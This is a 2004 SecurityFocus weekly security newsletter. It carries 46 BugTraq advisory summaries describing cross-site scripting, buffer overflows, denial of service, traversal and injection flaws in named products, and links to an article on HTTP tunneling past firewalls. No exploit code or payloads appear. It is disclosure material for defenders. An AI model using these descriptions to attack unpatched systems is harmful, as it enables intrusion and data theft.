ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
I. FRONT AND CENTER
1. Deploying Network Access Quarantine Control (part 1 of 2)
2. Data Driven Attacks Using HTTP Tunneling
II. BUGTRAQ SUMMARY
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
2. MailEnable Content-Length Denial Of Service Vulnerability
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
6. Webbsyte Chat Denial Of Service Vulnerability
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
9. Horde IMP HTML+TIME HTML Injection Vulnerability
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
11. BreakCalendar Multiple Remote Vulnerabilities
12. ripMIME MIME Attachment Decoding Weakness
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
17. Pete Stein GoScript Remote Command Execution Vulnerability
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
19. DGen Emulator Symbolic Link Vulnerability
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
22. Jetbox One Plaintext Password Storage Vulnerability
23. Jetbox One Remote Server-Side Script Execution Vulnerability
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
26. Acme thttpd Directory Traversal Vulnerability
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
30. LILO gfxboot Plaintext Password Display Vulnerability
31. YaST2 Utility Library File Verification Shell Code Injection...
32. phpBB Fetch All SQL Injection Vulnerability
33. Neon WebDAV Client Library Unspecified Vulnerability
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
35. Oracle Multiple Unspecified Vulnerabilities
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
41. CVSTrac filediff Remote Command Execution Vulnerability
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
43. Mozilla SSL Redirect Spoofing Vulnerability
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
45. GNU Info Follow XRef Buffer Overrun Vulnerability
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Wardriving guilty plea in Lowe's wi-fi case
2. Ashcroft wins Internet wiretap system
3. ATM keypads get a security boost
4. Phishermen attack on a viral scale
5. Price isn't right for new Bagle variant
6. Phone spam misery looms Stateside
IV. SECURITYFOCUS TOP 6 TOOLS
1. MonitorMagic - Server & Network Monitor 6.0
2. CipherPack Pro 3.2
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
4. SSlDigger 1.0
5. DiskLogon 1.0.17.112
6. UndeleteSMS 1.0
V. SECURITYJOBS LIST SUMMARY
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
12. [SJ-JOB] Security Consultant, Indianopolis, US (Thread)
13. [SJ-JOB] Account Manager, New York, US (Thread)
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
15. [SJ-JOB] Security Consultant, San Francisco , US (Thread)
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
21. [SJ-JOB] Management, Irvine, US (Thread)
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
24. [SJ-JOB] Security Consultant, New York, US (Thread)
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
VI. INCIDENTS LIST SUMMARY
1. New Mass Mailer Virus (Thread)
2. NDR +Hotmail & MSN (Thread)
3. distributed spamming/scamming scheme? (Thread)
4. Anyone else seeing SSH scans? (Thread)
5. Is this some type of scan (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. most avtive attack type (Thread)
2. SecurityFocus Microsoft Newsletter #200 (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Password recovery (Thread)
2. How to Restrict a user, not a root, Login to the Con... (Thread)
3. trouble setting up routing (Thread)
4. ipv6 questions + solaris 9 (Thread)
5. syslog logging (Thread)
X. LINUX FOCUS LIST SUMMARY
1. can Hopster traffic be blocked? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Deploying Network Access Quarantine Control (part 1 of 2)
By Jonathan Hassell
This article discusses Network Access Quarantine Control with Windows
Server 2003, which allows administrators to quarantine mobile users before
giving them full network access, by first ensuring these machines are
up-to-date according to a baseline security model.
http://www.securityfocus.com/infocus/1794
2. Data Driven Attacks Using HTTP Tunneling
By Ido Dubrawsky
In this article we will look at a means to bypass the access control
restrictions of a company's router or firewall. This information is
intended to provide help for those who are legitimately testing the
security of a network (whether they are in-house expertise or outside
consultants).
http://www.securityfocus.com/infocus/1793
II. BUGTRAQ SUMMARY
-------------------
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
BugTraq ID: 10837
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10837
Summary:
Reportedly Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'sresult.exe'. All code will be executed within the context of the website running the vulnerable software.
2. MailEnable Content-Length Denial Of Service Vulnerability
BugTraq ID: 10838
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10838
Summary:
MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.
When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.
The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
BugTraq ID: 10839
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10839
Summary:
Reportedly Gnu Transport Layer Security Library (GnuTLS) is affected by a X.509 certificate verification denial of service vulnerability. This issue is due to a design error that causes the application to attempt to verify invalid X.509 certificates.
This issue would allow an attacker to cause the affected application to consume CPU resources and hang while attempted verification takes place, denying service to legitimate users.
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
BugTraq ID: 10840
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10840
Summary:
The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server.
When malicious requests are received by the device, it will reportedly crash, denying service to legitimate users of the access point.
This issue can be exploited by anybody with network connectivity to the administration HTTP server, no authentication is required.
Version 1.21h of the device was found to be vulnerable, but other versions are also likely affected. Due to the practice of code-reuse in companies, it is also possible that other devices and products have this same flaw.
This BID may also be related to BID 6994, but this has not been confirmed.
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
BugTraq ID: 10841
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10841
Summary:
IBM Tivoli Directory Server is reported to contain a directory traversal vulnerability in its web front-end application.
This issue presents itself due to insufficient sanitization of user-supplied data.
This issue allows remote attackers to view potentially sensitive files on the server that are accessible to the 'ldap' user. This may aid an attacker in conducting further attacks against the vulnerable computer.
Versions 3.2.2, and 4.1 are reported vulnerable.
6. Webbsyte Chat Denial Of Service Vulnerability
BugTraq ID: 10842
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10842
Summary:
Webbsyte Chat is reported susceptible to a denial of service vulnerability.
This issue presents itself when multiple simultaneous TCP connections are made to the chat server. When this occurs, the application will reportedly crash, denying service to legitimate users.
Version 0.9 was reported vulnerable. The application is not supported any longer, so it is unlikely that a fix will become available.
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
BugTraq ID: 10843
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10843
Summary:
It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution.
An attacker can exploit this issue by crafting a malicious web page and having unsuspecting users view the page in a vulnerable version of Mozilla or Netscape.
Netscape 7.0, 7.1, and versions of Mozilla prior to 1.7.1 are known to be vulnerable to this issue. Users of affected versions of Netscape are urged to switch to Mozilla 1.7.1 or later, as new versions of Netscape are not likely to appear.
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
BugTraq ID: 10844
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10844
Summary:
It has been reported that the Sun Java Runtime Environment is affected by an access validation vulnerability within the XSLT processor.
An attacker might exploit this issue to allow an untrusted applet or application to read data from a trusted applet or application that is running within the same virtual machine. It has also been reported that this issue may facilitate privilege escalation.
9. Horde IMP HTML+TIME HTML Injection Vulnerability
BugTraq ID: 10845
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10845
Summary:
Reportedly Horde IMP is affected by an HTML injection vulnerability due to insufficient sanitization of HTML+TIME script.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
BugTraq ID: 10846
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10846
Summary:
WHM AutoPilot is reported prone to an information disclosure vulnerability. The issue is reported to exist due to a vulnerability in the functionality provided to permit an administrator to logon to WHM AutoPilot as another user.
It is reported that this vulnerability may be exploited by a remote attacker to disclose WHM AutoPilot usernames and passwords.
11. BreakCalendar Multiple Remote Vulnerabilities
BugTraq ID: 10847
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10847
Summary:
Reportedly BreakCalendar is affected by multiple remote vulnerabilities. These issues are due to a failure to sanitize user-supplied input.
An attacker could leverage these issues to conduct cross-site scripting attacks and to perform actions facilitated by the 'add event' and 'edit/remove event' forms.
12. ripMIME MIME Attachment Decoding Weakness
BugTraq ID: 10848
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10848
Summary:
It is reported that a weakness exists in ripMIMEs decoding routine.
If ripMIME is being used in conjunction with a virus scanning, or other similar type of application, this weakness has the affect of not passing the attachment to the engine. This means that the attachments will bypass the scanning process.
By bypassing the scanning process, the message may then be passed on to an end user while still containing virus, or other malicious code that should have been blocked by the filter.
Attackers may exploit this weakness by forming malicious content designed to pass through filtering software. This content is designed to be decoded by the end users MUA. Some MUAs may decode the MIME attachments, even though they are formed incorrectly, allowing the malicious content to be delivered.
Version 1.3.2.3 has been released which fixes this weakness.
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
BugTraq ID: 10849
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10849
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 1.10.
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
BugTraq ID: 10850
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10850
Summary:
Reportedly PuTTY is affected by a remote, pre-authentication code execution vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
BugTraq ID: 10851
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10851
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 2.0.
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
BugTraq ID: 10852
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10852
Summary:
A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.
An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.
It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.
17. Pete Stein GoScript Remote Command Execution Vulnerability
BugTraq ID: 10853
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10853
Summary:
Pete Stein GoScript is prone to a remote command execution vulnerability.
This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server.
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
BugTraq ID: 10854
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10854
Summary:
Juniper Networks NetScreen firewalls configured to run the SSHv1 service are reported prone to a denial of service vulnerability. It is reported that the vulnerability may be triggered by a remote attacker, prior to any form of authentication.
19. DGen Emulator Symbolic Link Vulnerability
BugTraq ID: 10855
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10855
Summary:
DGen is reportedly affected by a symbolic link vulnerability. This issue is due to a design error that fails to properly verify files prior to writing to them.
Successful exploitation of this issue will allow a local attacker to cause the affected application to overwrite arbitrary files with the privileges of the user that invoked the affected application. Reportedly this issue could be leveraged to facilitate privilege escalation.
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
BugTraq ID: 10856
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10856
Summary:
It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'mod.php'. All code will be executed within the context of the website running the vulnerable software.
This may allow for theft of cookie-based authentication credentials and other attacks.
Version 8.3 of the software is reported vulnerable. Other versions may also be affected.
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
BugTraq ID: 10857
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10857
Summary:
The libpng graphics library is reported prone to multiple vulnerabilities. The following issues are reported:
It is reported that a stack-based buffer overrun vulnerability exists in the libpng library (CAN-2004-0597).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When this image is viewed, the vulnerability may be triggered resulting in code execution occurring in the context of the user that viewed the malicious image.
A denial of service vulnerability is also reported to affect libpng (CAN-2004-0598).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, a NULL pointer dereference will occur resulting in a crash of the application that is linked to the vulnerable library.
Additionally several integer overrun vulnerabilities are reported to exist in png_handle_sPLT(), png_read_png() and other functions of libpng (CAN-2004-0599).
A remote attacker may exploit the integer-overrun conditions, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, an integer value may wrap, or be interpreted incorrectly resulting in a crash of the application that is linked to the vulnerable library, or may potentially result in arbitrary code execution.
This BID will be split into independent BIDs when further analysis of these vulnerabilities is complete.
22. Jetbox One Plaintext Password Storage Vulnerability
BugTraq ID: 10858
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10858
Summary:
It is reported that Jetbox One is prone to a plaintext password storage vulnerability.
A malicious user may use the sensitive data available from this vulnerability to launch further attacks against a vulnerable system.
It should be noted that although this vulnerability has been reported to affect Jetbox One version 2.0.8 other versions might also be affected.
23. Jetbox One Remote Server-Side Script Execution Vulnerability
BugTraq ID: 10859
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10859
Summary:
A vulnerability is reported to exist in Jetbox One that may allow a remote attacker to execute malicious scripts on a vulnerable system.
It is reported that an attacker may be able to place server side scripts in directories that could be accessed and executed later.
Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
Version 2.0.8 is reported vulnerable to this issue. Other versions may also be affected.
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
BugTraq ID: 10860
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10860
Summary:
It is reported that WackoWiki is susceptible to a cross-site scripting vulnerability in its textsearch form. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
Exploitation of this vulnerability may allow for theft of cookie-based authentication credentials and other attacks.
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
BugTraq ID: 10861
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10861
Summary:
PHP-Nuke is reported prone to an access control bypass vulnerability.
Reports indicate that a PHP-Nuke superuser may bypass access controls and privilege restrictions, to delete the PHP-Nuke "God Admin" account. This may be accomplished by making a specially crafted request for the "admin.php" script.
26. Acme thttpd Directory Traversal Vulnerability
BugTraq ID: 10862
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10862
Summary:
It is reported that thttpd is susceptible to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This issue only exists in the Windows port of the application, as it does not correctly take into consideration the environmental attributes of file system access in applications.
This issue may allow an attacker to retrieve arbitrary, potentially sensitive files, from the affected host computer, as the user that the thttpd process is running as.
Version 2.07 beta 0.4 of thttpd, running on a Microsoft Windows platform is reported vulnerable to this issue.
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
BugTraq ID: 10863
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10863
Summary:
Free Web Chat server is reported prone to multiple denial of service vulnerabilities. The following issues are reported:
The first denial of service vulnerability reported results from a lack of sufficient sanitization performed on username data. It is reported that a user with a void name may be added. This action will result in a NullPointerException.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
The second denial of service vulnerability is reported to exist due to resource consumption. It is reported that the Free Web Chat server does not properly manage multiple connections that originate from the same location.
A remote attacker may exploit this vulnerability to deny service to legitimate users.
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
BugTraq ID: 10864
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10864
Summary:
Gnome VFSs 'extfs' scripts are reported prone to an undisclosed vulnerability.
It is reported that a user that views specially crafted, attacker supplied URIs utilizing the 'extfs' VFS module may be able to execute arbitrary commands in the context of the user.
This BID will be updated as further information is disclosed.
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
BugTraq ID: 10865
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10865
Summary:
It is reported that there are multiple unspecified buffer overflow vulnerabilities in the MSN protocol module in Gaim.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
30. LILO gfxboot Plaintext Password Display Vulnerability
BugTraq ID: 10866
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10866
Summary:
Reportedly gfxboot is affected by a plain text password display vulnerability. This issue is due to a design error that fails to protect user passwords.
The problem reportedly results in the plain text lilo boot password to be displayed when typing.
An attacker might leverage this issue to read the plain text lilo boot password.
31. YaST2 Utility Library File Verification Shell Code Injection...
BugTraq ID: 10867
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10867
Summary:
YaST2 utility library 'liby2util' is affected by a file verification shell code injection vulnerability. This issue is due to a design error that fails to properly validate files.
An attacker could leverage this issue to inject malicious shell code into a file name being transferred using the vulnerable utility. This might facilitate privilege escalation and unauthorized access.
32. phpBB Fetch All SQL Injection Vulnerability
BugTraq ID: 10868
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10868
Summary:
It is reported that phpBB Fetch All is susceptible to an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input before using it in an SQL query.
The successful exploitation of this vulnerability depends on the implementation of the web application that includes phpBB Fetch All as a component. It may or may not be possible to effectively pass malicious SQL statements to the underlying function.
Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Versions prior to 2.0.12 are reported to be affected.
33. Neon WebDAV Client Library Unspecified Vulnerability
BugTraq ID: 10869
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10869
Summary:
It is reported that Neon contains an unspecified vulnerability. The cause of this vulnerability is currently unknown.
Due to the nature of the library, it is likely that this is a remotely exploitable issue.
It is currently unknown what the affects and impacts of this issue is. This BID will be updated immediately when more information becomes available.
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
BugTraq ID: 10870
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10870
Summary:
PSCP is reported prone to a buffer overrun vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
35. Oracle Multiple Unspecified Vulnerabilities
BugTraq ID: 10871
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10871
Summary:
It has been reported that multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
The reported vulnerabilities include SQL injection, buffer overflows, and others.
Details about any of the vulnerabilities are unknown at this time. This BID will be updated and split into individual BIDs as further information is disclosed.
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
BugTraq ID: 10872
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10872
Summary:
Reportedly LibPNG contains a buffer offset calculation error that may facilitate a buffer overflow vulnerability. This issue is due to a logical design error.
This vulnerability may allow an attacker to crash applications utilizing the library, or potentially allow code execution.
Please note that vulnerabilities previously outlined in this BID have been described in the LibPNG Graphics Library Multiple Remote Vulnerabilities outlined in BID 10857.
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
BugTraq ID: 10873
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10873
Summary:
Opera is affected by a remote location object cross-domain scripting vulnerability. This issue is due to a failure to properly validate methods that a user can access.
An attacker might leverage this issue to steal cookie based authentication credentials, conduct phishing attacks along with other attacks. Furthermore, provided there is an HTML script invoking 'location' methods local to a victim's computer (such as c:/winnt/help/ciadmin.htm in most Microsoft Windows implementations) an attacker can exploit this issue to gain read access to directory contents, files and email read using Opera's email utilities.
Although this issue is reported to affect versions 1.52 and 1.53 of the affected software, it is likely that earlier versions are also affected.
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
BugTraq ID: 10874
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10874
Summary:
Mozilla browser is reportedly affected by an input type HTML tag unauthorized access vulnerability. This issue is due to an access validation error that allows access to arbitrary files on an unsuspecting user's system.
This issue will allow an attacker to obtain arbitrary files residing on the computer of an unsuspecting user that activates a malicious script.
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
BugTraq ID: 10875
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10875
Summary:
Mozilla and Mozilla Thunderbird are reported prone to a remote heap overflow vulnerability. The issue is reported to exist due to a lack of sufficient boundary checks performed on POP3 data handled by SendUidl().
An attacker controlled POP3 mail server may exploit this condition by sending a specifically crafted email message to the affected mail client. This will result in the corruption of heap-based memory.
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
BugTraq ID: 10876
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10876
Summary:
Mozilla browser is reportedly vulnerable to an SSL certificate spoofing vulnerability in the 'cert_TestHostName()' function. This issue is due to a design error that fails to properly validate certified host names.
This issue would allow an attacker to spoof a trusted certificate from a third party site, facilitating phishing style attacks by luring an unsuspecting user to enter information on what is apparently a trusted site.
41. CVSTrac filediff Remote Command Execution Vulnerability
BugTraq ID: 10878
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10878
Summary:
CVSTrac is affected by a remote command execution vulnerability in the 'filediff' functionality. This issue is due to an input validation error that allows for the appending of shell commands.
An attacker could leverage this issue to execute arbitrary shell commands on a vulnerable computer with the privileges of the web server process.
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
BugTraq ID: 10879
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10879
Summary:
A vulnerability has been reported to exist in Microsoft Internet Explorer that may allow remote attackers to pass arbitrary command line arguments to an application associated with the mms: URI protocol handler. Windows Media Player is the application normally associated with this URI protocol handler.
This vulnerability would permit an attacker to influence the invocation arguments for the executable and could result in loss of compromise of various security properties. This may be exploited from a malicious Web page or possibly through HTML email.
It is not known if this issue is specific to the mms: URI protocol handler or if other URI protocol handlers on the system may be similarly affected. This vulnerability could be a general issue in Internet Explorer with many possible attack vectors, although there is not enough information available at this time to make this determination.
43. Mozilla SSL Redirect Spoofing Vulnerability
BugTraq ID: 10880
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10880
Summary:
It is reported that Mozilla, and products derived from Mozilla are susceptible to an SSL redirect spoofing vulnerability.
By exploiting this vulnerability, an attacker can ensure that the victims browser contains the SSL lock icon, and will display the SSL certificate information of a legitimate site when the lock is clicked on.
This vulnerability may aid in Phishing style attacks.
Mozilla prior to 1.7, Mozilla Firebird 0.7, Mozilla Firefox prior to 0.9, and Mozilla Thunderbird prior to 0.7 are all reported vulnerable.
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
BugTraq ID: 10881
Remote: Yes
Date Published: Aug 05 2004
Relevant URL: http://www.securityfocus.com/bid/10881
Summary:
A vulnerability is reported to exist in the algorithms used by Thomson SpeedTouch Home ADSL Modem to generate initial TCP sequence numbers. The ability to predict TCP sequence numbers may allow a remote attacker to inject packets into a vulnerable data stream, for example the telnet service on the affected modem.
45. GNU Info Follow XRef Buffer Overrun Vulnerability
BugTraq ID: 10882
Remote: No
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10882
Summary:
GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.
An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.
Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 10883
Remote: Yes
Date Published: Aug 06 2004
Relevant URL: http://www.securityfocus.com/bid/10883
Summary:
phpBB is affected by a cross-site scripting vulnerability in the 'login.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This can be exploited by constructing links that pass malicious strings through the affected URI parameter. If an unsuspecting user visits such a link, the malicious, externally created content supplied in the link will be rendered (or executed, in the case of script code) as part of the 'login.php' document and within the context of the vulnerable website (including the phpBB forum).
